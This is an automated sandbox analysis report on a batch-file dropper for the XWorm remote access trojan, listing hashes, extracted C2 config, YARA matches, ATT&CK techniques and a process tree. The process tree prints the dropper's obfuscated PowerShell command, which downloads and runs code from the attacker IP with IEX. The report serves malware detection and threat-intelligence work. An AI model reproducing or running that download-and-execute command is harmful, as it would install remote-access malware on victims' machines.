xworm | 450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f

General

Target

450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f.bat
Size

180B
MD5

b3cede4b5d517877a96f997ef702fb47
SHA1

a4aa92e6231e8ac310b32ecfd6d8f82f3b1c76af
SHA256

450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f
SHA512

5d7e73be8121dd8d3374d773d83f1fc553e748ef863a7fc7d914eecae8d1086dcb17dfc14a36ffd00456802af1f708ea19e8c8887203137c6ecf77c7f1239080

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://92.255.57.221/a.mp4

Extracted

Family

xworm

Version

5.0

C2

92.255.57.221:4414

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0003000000022b4f-25.dat	family_xworm
behavioral2/memory/400-26-0x0000020A261B0000-0x0000020A261C0000-memory.dmp	family_xworm
behavioral2/memory/1660-28-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	400	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
400	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 400 set thread context of 1660	400	powershell.exe	98

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
400	powershell.exe
400	powershell.exe
400	powershell.exe
400	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	1660	MSBuild.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1916 wrote to memory of 400	1916	cmd.exe	87
PID 1916 wrote to memory of 400	1916	cmd.exe	87
PID 400 wrote to memory of 3556	400	powershell.exe	95
PID 400 wrote to memory of 3556	400	powershell.exe	95
PID 3556 wrote to memory of 4924	3556	csc.exe	96
PID 3556 wrote to memory of 4924	3556	csc.exe	96
PID 400 wrote to memory of 2512	400	powershell.exe	97
PID 400 wrote to memory of 2512	400	powershell.exe	97
PID 400 wrote to memory of 2512	400	powershell.exe	97
PID 400 wrote to memory of 1660	400	powershell.exe	98
PID 400 wrote to memory of 1660	400	powershell.exe	98
PID 400 wrote to memory of 1660	400	powershell.exe	98
PID 400 wrote to memory of 1660	400	powershell.exe	98
PID 400 wrote to memory of 1660	400	powershell.exe	98
PID 400 wrote to memory of 1660	400	powershell.exe	98
PID 400 wrote to memory of 1660	400	powershell.exe	98
PID 400 wrote to memory of 1660	400	powershell.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$FC1='ject Net.WebCli';$FC2='loadString(''http://92.255.57.221/a.mp4'')';$FC3='ent).Down';$FC4='(New-Ob';$E5=IEX ($FC4,$FC1,$FC3,$FC2 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\23oig20m\23oig20m.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA18F.tmp" "c:\Users\Admin\AppData\Local\Temp\23oig20m\CSC30A40723D3E44F0C8F981D968EFFC45F.TMP"
      4⤵
      PID:4924
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2512
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\23oig20m\23oig20m.dll

Filesize
42KB

MD5
00b8bf9217f747c070e7b7123b62b5d4

SHA1
3cd71abdcc87b72ddfd8a9cf85d7ee8851d1c907

SHA256
3822056f43a0cc955ce7a705c97dd45cf8cc14810588ade684298b71365c4710

SHA512
a2cb6e8f66cf40f98bd7dcb6aa510a80fdeb658154480e6968651ccb9bbca898f67f93889aa2acb24a5ba2585b4caff59a80eb8cdf69ac244055572adc7ad8a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA18F.tmp

Filesize
1KB

MD5
159770f0ce67bc67e35e0ff033f4cec5

SHA1
1854f6b94b8a776fe2d62701b336a1ec7a80cadf

SHA256
2730738b706bf6932310afc1dea68c59cfb21ccc09e65c3c49099e6fb66938e4

SHA512
4b3170fa3176e977f65c83bdddb5117d8e3a378ff7da34f91bfed2c13c4c97b76ed0e02c371e4461af8aef2bc2a94689ff8c0ce4e96ca40eb67206c1feb78872

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2deukmw4.3d1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\23oig20m\23oig20m.0.cs

Filesize
103KB

MD5
992ab26a03ded91714491d267da55fb2

SHA1
25fe04d5493f7e904bd4e64078aa464226e8f393

SHA256
3b18772dbf088171f78cccd3da6fb05f46918b2bafa17ab43ea03ec0507935c1

SHA512
a1dbfd27e02d10e978475bf9c1279c489e1c9febd8456492e2b0d7df33563c4e81cc28e39f6a90aa82cadc06927bce2f831f2089b5e57da4ea89862a6d82ad0f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\23oig20m\23oig20m.cmdline

Filesize
204B

MD5
9379b5e8475afc528f15607515ac066a

SHA1
ad3c72da2080bac785782ff62784e80b6b5ad5b9

SHA256
66d7ffbb3ffe3d1fb1858236f4349beca932e6e0a3e3d65fa57702a3e2a81eb4

SHA512
7b084e26c0530a2cfbde3885ee718f71c0a8426973f36fac4372d35b9e0f92206c04aaf083ee24c1bd21875d23c7d0820af095e91341eaf0e25aacb110f02033

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\23oig20m\CSC30A40723D3E44F0C8F981D968EFFC45F.TMP

Filesize
652B

MD5
4bdad2d5492563f88e5645478ef42c19

SHA1
2cab99970a8a8f92f78b23655ddf5f29ca3e8092

SHA256
7853bd04228c613be1bbf4758dc2e833f8951d6ad5304aa65d2a87ddb3994aa6

SHA512
adb7546380c05ebe50bae38ae568ec978e86dbb1e33c629accc645a78fd0a99bbc2130d5741e0fa784f715e0da29677559ade397a8f707b5008d291d50580760

Download Submit
memory/400-12-0x00007FFA7D1B0000-0x00007FFA7DC71000-memory.dmp

Filesize
10.8MB

Download
memory/400-13-0x0000020A3F1C0000-0x0000020A3F228000-memory.dmp

Filesize
416KB

Download
memory/400-0-0x00007FFA7D1B3000-0x00007FFA7D1B5000-memory.dmp

Filesize
8KB

Download
memory/400-11-0x00007FFA7D1B0000-0x00007FFA7DC71000-memory.dmp

Filesize
10.8MB

Download
memory/400-1-0x0000020A3E450000-0x0000020A3E472000-memory.dmp

Filesize
136KB

Download
memory/400-26-0x0000020A261B0000-0x0000020A261C0000-memory.dmp

Filesize
64KB

Download
memory/400-31-0x00007FFA7D1B0000-0x00007FFA7DC71000-memory.dmp

Filesize
10.8MB

Download
memory/1660-28-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1660-32-0x0000000005120000-0x00000000051BC000-memory.dmp

Filesize
624KB

Download
memory/1660-33-0x00000000057B0000-0x0000000005816000-memory.dmp

Filesize
408KB

Download
memory/1660-34-0x0000000006270000-0x0000000006302000-memory.dmp

Filesize
584KB

Download
memory/1660-35-0x00000000068C0000-0x0000000006E64000-memory.dmp

Filesize
5.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads